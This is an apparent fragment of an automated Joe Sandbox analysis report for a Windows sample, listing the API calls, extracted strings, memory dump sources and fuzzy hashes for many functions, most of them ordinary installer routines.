                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: OffsetRect
                                                                          • String ID:
                                                                          • API String ID: 177026234-0
                                                                          • Opcode ID: cfbccf1d698e82d79065cf95299db1547cf674505700e5d727bb5bb08f6f6c11
                                                                          • Instruction ID: 626cbd3239d4ed1d666785e4d5506dc5f63added092c4cfac4a9a75855a5826e
                                                                          • Opcode Fuzzy Hash: cfbccf1d698e82d79065cf95299db1547cf674505700e5d727bb5bb08f6f6c11
                                                                          • Instruction Fuzzy Hash: EF217AB6704201AFD700DE69CD85EABBBEEEBC4304F14CA2AF554C7249D634ED0487A6
                                                                          APIs
                                                                          • GetCursorPos.USER32 ref: 00417270
                                                                          • SetCursor.USER32(00000000), ref: 004172B3
                                                                          • GetLastActivePopup.USER32(?), ref: 004172DD
                                                                          • GetForegroundWindow.USER32(?), ref: 004172E4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                          • String ID:
                                                                          • API String ID: 1959210111-0
                                                                          • Opcode ID: 8d64426bf1faa67f7e63d5b49e58984f19945b6ec6e4dfcc44bb455274275b92
                                                                          • Instruction ID: d42235d32f12bbd537443306c781531a61dc82822ae97907460fdfc4b9dfd860
                                                                          • Opcode Fuzzy Hash: 8d64426bf1faa67f7e63d5b49e58984f19945b6ec6e4dfcc44bb455274275b92
                                                                          • Instruction Fuzzy Hash: E02183313086018BCB20EB69D885AD773B1AB44758F4545ABF895CB352D73DDC82CB89
                                                                          APIs
                                                                          • MulDiv.KERNEL32(?,00000008,?), ref: 00493A51
                                                                          • MulDiv.KERNEL32(?,00000008,?), ref: 00493A65
                                                                          • MulDiv.KERNEL32(?,00000008,?), ref: 00493A79
                                                                          • MulDiv.KERNEL32(?,00000008,?), ref: 00493A97
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                          • Instruction ID: 4fded1b76b16cf5233eb9f491647a43cf70802087f48ea21bc09c20ce05eabc8
                                                                          • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                          • Instruction Fuzzy Hash: D011FE72604204ABCB40DEA9D8C4D9B7BECEF4D364B1541AAF918DB246D674ED408BA8
                                                                          APIs
                                                                          • GetClassInfoA.USER32(00400000,0041F480,?), ref: 0041F4B1
                                                                          • UnregisterClassA.USER32(0041F480,00400000), ref: 0041F4DA
                                                                          • RegisterClassA.USER32(00498598), ref: 0041F4E4
                                                                          • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F51F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                          • String ID:
                                                                          • API String ID: 4025006896-0
                                                                          • Opcode ID: 533d640a4b08feb0459202762eb42d0053809421209bdbe4521837a12811d117
                                                                          • Instruction ID: 3ade520867520f28231aed23d56b060c1ae6e85fc3aaaf2b039856689379b016
                                                                          • Opcode Fuzzy Hash: 533d640a4b08feb0459202762eb42d0053809421209bdbe4521837a12811d117
                                                                          • Instruction Fuzzy Hash: 600152B12401047BCB10EF6DED81E9B37999769314B11413BBA05E72E1DA3A9C194BAD
                                                                          APIs
                                                                          • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D227
                                                                          • LoadResource.KERNEL32(00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B574,0000000A,REGDLL_EXE), ref: 0040D241
                                                                          • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B574), ref: 0040D25B
                                                                          • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?), ref: 0040D265
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                          • String ID:
                                                                          • API String ID: 3473537107-0
                                                                          • Opcode ID: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
                                                                          • Instruction ID: 8b55825d53d46818f15098a3aa340eb6897fe62b828c159971ec5f2842f97e2f
                                                                          • Opcode Fuzzy Hash: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
                                                                          • Instruction Fuzzy Hash: ADF062736046046F8704EE9DA881D5B77ECDE88364310017FF908EB246DA38DD018B78
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,Mj,?,?,?,004018B4), ref: 00401566
                                                                          • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,Mj,?,?,?,004018B4), ref: 0040158B
                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,Mj,?,?,?,004018B4), ref: 004015B1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$Alloc$Free
                                                                          • String ID: Mj
                                                                          • API String ID: 3668210933-209792402
                                                                          • Opcode ID: 4642c5e47627af4fb9a65464f5cf053fdc587df3507c7da2e3a58868ba6a62e8
                                                                          • Instruction ID: 5daa563b5b1fa11dd2f788f5c35568dff97f2482912b9d75d2b1da0796ca24bc
                                                                          • Opcode Fuzzy Hash: 4642c5e47627af4fb9a65464f5cf053fdc587df3507c7da2e3a58868ba6a62e8
                                                                          • Instruction Fuzzy Hash: DFF0C2B1640320AAEB315A294C85F133AD8DBC5794F1040B6BE09FF3DAD6B8980082AD
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,00000000), ref: 0046EE29
                                                                          Strings
                                                                          • Failed to set NTFS compression state (%d)., xrefs: 0046EE3A
                                                                          • Setting NTFS compression on directory: %s, xrefs: 0046EDF7
                                                                          • Unsetting NTFS compression on directory: %s, xrefs: 0046EE0F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                          • API String ID: 1452528299-1392080489
                                                                          • Opcode ID: 69acb3433b7424efc8733916a2e3fd5d2b01e13f314b1d1949af057b0dba6a86
                                                                          • Instruction ID: 1e7f5b79b7b83b0710ae0b74761658cb8013dc9fe861025df3af78f0f88b0ad9
                                                                          • Opcode Fuzzy Hash: 69acb3433b7424efc8733916a2e3fd5d2b01e13f314b1d1949af057b0dba6a86
                                                                          • Instruction Fuzzy Hash: B1016734E0824856CF04D7EEA0412DDBBE49F09314F4485EFA855DB383EB7A0A0987AB
                                                                          APIs
                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                          • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045AECE,?,?,?,?,?,00000000,0045AEF5), ref: 004552F4
                                                                          • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045AECE,?,?,?,?,?,00000000), ref: 004552FD
                                                                          • RemoveFontResourceA.GDI32(00000000), ref: 0045530A
                                                                          • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0045531E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                          • String ID:
                                                                          • API String ID: 4283692357-0
                                                                          • Opcode ID: 697a476951aa0a0ca9570e552bc061f69c865505889b6d894dbdf5d1e046680c
                                                                          • Instruction ID: 219cbfe3a978a329188234ed78272d854ba8405160bd4c7ea72be768510c46b8
                                                                          • Opcode Fuzzy Hash: 697a476951aa0a0ca9570e552bc061f69c865505889b6d894dbdf5d1e046680c
                                                                          • Instruction Fuzzy Hash: A3F05EB574070036EA10B6B69C87F2F268C9F98746F10483BBA04EF2C3D97CD804562D
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,00000000), ref: 0046F5D5
                                                                          Strings
                                                                          • Failed to set NTFS compression state (%d)., xrefs: 0046F5E6
                                                                          • Unsetting NTFS compression on file: %s, xrefs: 0046F5BB
                                                                          • Setting NTFS compression on file: %s, xrefs: 0046F5A3
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                          • API String ID: 1452528299-3038984924
                                                                          • Opcode ID: 2ae6e740da7d12cab45fc3fda2904aab771333dfed4c0176c99f618606694c86
                                                                          • Instruction ID: af1263a2bc2d08d5f84e5bf4467a93fc8ad6fd7f39d305876acfad47ab44e8ff
                                                                          • Opcode Fuzzy Hash: 2ae6e740da7d12cab45fc3fda2904aab771333dfed4c0176c99f618606694c86
                                                                          • Instruction Fuzzy Hash: 43016C30D0824865CF14DB9DA0412DDBBE49F09314F5485FFA895DB343EA790A0D8BAB
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CountSleepTick
                                                                          • String ID:
                                                                          • API String ID: 2227064392-0
                                                                          • Opcode ID: 0d6abcf2624c376c92be4fe051ac8c721ea0e8e4158ee005a25feb70aac8199d
                                                                          • Instruction ID: 04319ed9576db886230fb9bc867ee798ddcaac356600663dffa6fb38092a16ff
                                                                          • Opcode Fuzzy Hash: 0d6abcf2624c376c92be4fe051ac8c721ea0e8e4158ee005a25feb70aac8199d
                                                                          • Instruction Fuzzy Hash: 70E09B7230954149DA2935BF28C67BF5588CBC5764F145D3FF08DD6282C91C4C4796BE
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A,00000000), ref: 00476CB5
                                                                          • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A), ref: 00476CBB
                                                                          • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7), ref: 00476CDD
                                                                          • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7), ref: 00476CEE
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                          • String ID:
                                                                          • API String ID: 215268677-0
                                                                          • Opcode ID: 643da1b25484e25618dfc2f33770e0810dba7622c7134d6ef75615b708b11c8e
                                                                          • Instruction ID: 52cacee470f693cc175e787ed480d05e054b7fb82800b5b9fad0ca038f03fef1
                                                                          • Opcode Fuzzy Hash: 643da1b25484e25618dfc2f33770e0810dba7622c7134d6ef75615b708b11c8e
                                                                          • Instruction Fuzzy Hash: 04F01CA16447016ED600EAB5CD82A9B76DCEB44354F04883ABE98C72C1D678D808AA66
                                                                          APIs
                                                                          • GetLastActivePopup.USER32(?), ref: 0042425C
                                                                          • IsWindowVisible.USER32(?), ref: 0042426D
                                                                          • IsWindowEnabled.USER32(?), ref: 00424277
                                                                          • SetForegroundWindow.USER32(?), ref: 00424281
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                          • String ID:
                                                                          • API String ID: 2280970139-0
                                                                          • Opcode ID: 815aaf66aeb93fdb7eaca90ddf7e3ec79125ce151ba931028ab749093d5bac7c
                                                                          • Instruction ID: cc3e18b4355afb8de1117362fa5ee1cc3bb5bcb08e60588071b409dab7082488
                                                                          • Opcode Fuzzy Hash: 815aaf66aeb93fdb7eaca90ddf7e3ec79125ce151ba931028ab749093d5bac7c
                                                                          • Instruction Fuzzy Hash: DBE08691B02571929E71FA671881A9F018CCD45BE434602A7FD04F7243DB1CCC0041BC
                                                                          APIs
                                                                          • GlobalHandle.KERNEL32 ref: 00406287
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040628E
                                                                          • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
                                                                          • GlobalLock.KERNEL32(00000000), ref: 00406299
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocHandleLockUnlock
                                                                          • String ID:
                                                                          • API String ID: 2167344118-0
                                                                          • Opcode ID: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                          • Instruction ID: ad050c8fb554795a0ca7e59246f03ac17dd57b6c6051e6027a9978793207e39e
                                                                          • Opcode Fuzzy Hash: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                          • Instruction Fuzzy Hash: A0B009C5814A05B9EC0833B24C0BD3F141CD88072C3808A6FB458BA1839C7C9C402A3D
                                                                          APIs
                                                                          • GetSystemMenu.USER32(00000000,00000000,0000F060,00000001), ref: 0046A1F3
                                                                          • EnableMenuItem.USER32(00000000,00000000,00000000), ref: 0046A1F9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$EnableItemSystem
                                                                          • String ID: CurPageChanged
                                                                          • API String ID: 3692539535-2490978513
                                                                          • Opcode ID: ce3d69d9ba1a62642177f6d71e0f7aaa340e11e2d471205b7fc5bc675cd66b6b
                                                                          • Instruction ID: 7720c050ea6da0ef8e1be1b899a85f81ec2d70891b76be637dda81d079de5e74
                                                                          • Opcode Fuzzy Hash: ce3d69d9ba1a62642177f6d71e0f7aaa340e11e2d471205b7fc5bc675cd66b6b
                                                                          • Instruction Fuzzy Hash: 04B12834604604DFCB11DB59DA85EE973F5EF49308F2540F6E804AB362EB38AE51DB4A
                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047A685,?,00000000,00000000,00000001,00000000,004790B1,?,00000000), ref: 00479075
                                                                          Strings
                                                                          • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 00478EE9
                                                                          • Failed to parse "reg" constant, xrefs: 0047907C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                          • API String ID: 3535843008-1938159461
                                                                          • Opcode ID: 6cfa3a26321e55d12a01db98da27023ce14a7644c07822183f99b0fb8cfb2842
                                                                          • Instruction ID: fcc941d39f61a36dc7ba98d018d7fa63e98928215e6e5a71d63c1788f81e571e
                                                                          • Opcode Fuzzy Hash: 6cfa3a26321e55d12a01db98da27023ce14a7644c07822183f99b0fb8cfb2842
                                                                          • Instruction Fuzzy Hash: F3818174E00148AFCF10EF95D485ADEBBF9AF49314F50816AE814B7391CB38AE05CB99
                                                                          APIs
                                                                          • GetForegroundWindow.USER32(00000000,00481AC0,?,00000000,00481B01,?,?,00000001,?,00000000,00000000,00000000,?,0046AF84), ref: 0048196F
                                                                          • SetActiveWindow.USER32(?,00000000,00481AC0,?,00000000,00481B01,?,?,00000001,?,00000000,00000000,00000000,?,0046AF84), ref: 00481981
                                                                          Strings
                                                                          • Will not restart Windows automatically., xrefs: 00481AA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ActiveForeground
                                                                          • String ID: Will not restart Windows automatically.
                                                                          • API String ID: 307657957-4169339592
                                                                          • Opcode ID: 7f50b30166131407a8f128673f7788f83b908c9bbef8313c0fb59228be05c9af
                                                                          • Instruction ID: 795901fb084f52fa528f63c2312e933fc6fdee27908fd8459f339c5c9385a105
                                                                          • Opcode Fuzzy Hash: 7f50b30166131407a8f128673f7788f83b908c9bbef8313c0fb59228be05c9af
                                                                          • Instruction Fuzzy Hash: AC41F030604240AFD725EBA5E945B6E7BA8E726704F1448B7F4408B372E37C5842DB9E
                                                                          APIs
                                                                          • GetCursorPos.USER32(?), ref: 00424975
                                                                          • WaitMessage.USER32(00000000,00424A69,?,?,?,?), ref: 00424A49
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CursorMessageWait
                                                                          • String ID: +qI
                                                                          • API String ID: 4021538199-4068327824
